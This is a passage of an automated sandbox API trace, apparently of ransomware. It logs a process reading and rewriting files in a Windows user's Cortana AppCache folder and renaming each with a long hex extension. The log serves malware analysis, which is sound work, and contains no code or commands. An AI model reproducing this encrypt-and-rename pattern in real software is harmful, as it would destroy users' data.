lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.006] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.007] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2=".F9D8AD7BAEF3438E86EB7DD3DC59F3EA4C59F0F3CAFFF533B7E8FFE91E71AB35" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt.F9D8AD7BAEF3438E86EB7DD3DC59F3EA4C59F0F3CAFFF533B7E8FFE91E71AB35") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt.F9D8AD7BAEF3438E86EB7DD3DC59F3EA4C59F0F3CAFFF533B7E8FFE91E71AB35" [0119.007] GetProcessHeap () returned 0x600000 [0119.007] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d80f0 [0119.007] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x6d80f0, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.009] CloseHandle (hObject=0x33c) returned 1 [0119.009] GetProcessHeap () returned 0x600000 [0119.009] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.009] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.012] ReadFile (in: hFile=0x33c, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.012] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.013] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.013] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2=".941F5CF602B223F1E9373407A77AB80B858DD094FE4075A195D1DE3E3DE0CD52" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt.941F5CF602B223F1E9373407A77AB80B858DD094FE4075A195D1DE3E3DE0CD52") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt.941F5CF602B223F1E9373407A77AB80B858DD094FE4075A195D1DE3E3DE0CD52" [0119.013] GetProcessHeap () returned 0x600000 [0119.013] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d8338 [0119.014] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x6d8338, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.014] CloseHandle (hObject=0x33c) returned 1 [0119.015] GetProcessHeap () returned 0x600000 [0119.015] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.015] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.018] ReadFile (in: hFile=0x33c, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.018] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.019] WriteFile (in: hFile=0x33c, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.020] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.020] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.021] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2=".B637AB9C54B66D5BED60DA399D983A7859EEF08D5F9147E529EBA9962B27A214" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt.B637AB9C54B66D5BED60DA399D983A7859EEF08D5F9147E529EBA9962B27A214") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt.B637AB9C54B66D5BED60DA399D983A7859EEF08D5F9147E529EBA9962B27A214" [0119.021] GetProcessHeap () returned 0x600000 [0119.021] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d8580 [0119.021] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x6d8580, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.022] CloseHandle (hObject=0x33c) returned 1 [0119.022] GetProcessHeap () returned 0x600000 [0119.022] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.024] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.028] ReadFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0119.028] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.028] WriteFile (in: hFile=0x334, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0119.029] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.029] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.030] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2=".A159D44289546F098E157182EE81827E4B22A3153D92813F00694CE6C0A1CC77" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt.A159D44289546F098E157182EE81827E4B22A3153D92813F00694CE6C0A1CC77") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt.A159D44289546F098E157182EE81827E4B22A3153D92813F00694CE6C0A1CC77" [0119.030] GetProcessHeap () returned 0x600000 [0119.030] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d87c8 [0119.030] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6d87c8, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.031] CloseHandle (hObject=0x334) returned 1 [0119.032] GetProcessHeap () returned 0x600000 [0119.032] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0119.034] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.039] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.039] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.039] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 0x0 [0119.040] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.041] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.041] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt", lpString2=".6D5FD821ADCB5805CCD52A2CDA15A6673716A2D3113D3FAC5E35B1257BAA5662" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt.6D5FD821ADCB5805CCD52A2CDA15A6673716A2D3113D3FAC5E35B1257BAA5662") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt.6D5FD821ADCB5805CCD52A2CDA15A6673716A2D3113D3FAC5E35B1257BAA5662" [0119.041] GetProcessHeap () returned 0x600000 [0119.041] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d8a10 [0119.042] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6d8a10, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.043] CloseHandle (hObject=0x334) returned 1 [0119.045] GetProcessHeap () returned 0x600000 [0119.045] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.045] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.049] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.049] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.050] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.051] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt", lpString2=".97513905AF0EAA3D16E87E75F8CFD6A602D4ED0D475A94DAA539D9A29B508508" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt.97513905AF0EAA3D16E87E75F8CFD6A602D4ED0D475A94DAA539D9A29B508508") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt.97513905AF0EAA3D16E87E75F8CFD6A602D4ED0D475A94DAA539D9A29B508508" [0119.051] GetProcessHeap () returned 0x600000 [0119.051] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d8c58 [0119.051] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6d8c58, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.053] CloseHandle (hObject=0x334) returned 1 [0119.053] GetProcessHeap () returned 0x600000 [0119.053] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.055] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.059] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.060] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.061] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.061] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt", lpString2=".CA3A31909DEDDC9B3AB1A574AD8A43866352971B3E592AC84D477E711E67340B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt.CA3A31909DEDDC9B3AB1A574AD8A43866352971B3E592AC84D477E711E67340B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt.CA3A31909DEDDC9B3AB1A574AD8A43866352971B3E592AC84D477E711E67340B" [0119.061] GetProcessHeap () returned 0x600000 [0119.061] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d8ea0 [0119.062] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6d8ea0, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.063] CloseHandle (hObject=0x334) returned 1 [0119.063] GetProcessHeap () returned 0x600000 [0119.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.063] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.067] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.067] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.068] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.068] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.069] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.069] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt", lpString2=".4B574771129B84DA2F2704688BF2EFC64A8B36632AD16CEE088AD33176800E56" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt.4B574771129B84DA2F2704688BF2EFC64A8B36632AD16CEE088AD33176800E56") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt.4B574771129B84DA2F2704688BF2EFC64A8B36632AD16CEE088AD33176800E56" [0119.069] GetProcessHeap () returned 0x600000 [0119.069] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d90e8 [0119.069] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6d90e8, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.070] CloseHandle (hObject=0x334) returned 1 [0119.071] GetProcessHeap () returned 0x600000 [0119.071] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.071] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.073] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.074] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.074] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.075] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt", lpString2=".34611D207FBC2AA96D920A85C11629CADBCA987BF736D1C82F0EECC2AD0B4C6F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt.34611D207FBC2AA96D920A85C11629CADBCA987BF736D1C82F0EECC2AD0B4C6F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt.34611D207FBC2AA96D920A85C11629CADBCA987BF736D1C82F0EECC2AD0B4C6F" [0119.075] GetProcessHeap () returned 0x600000 [0119.075] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x3185048 [0119.075] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x3185048, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.076] CloseHandle (hObject=0x334) returned 1 [0119.076] GetProcessHeap () returned 0x600000 [0119.076] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.077] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.079] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.079] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: 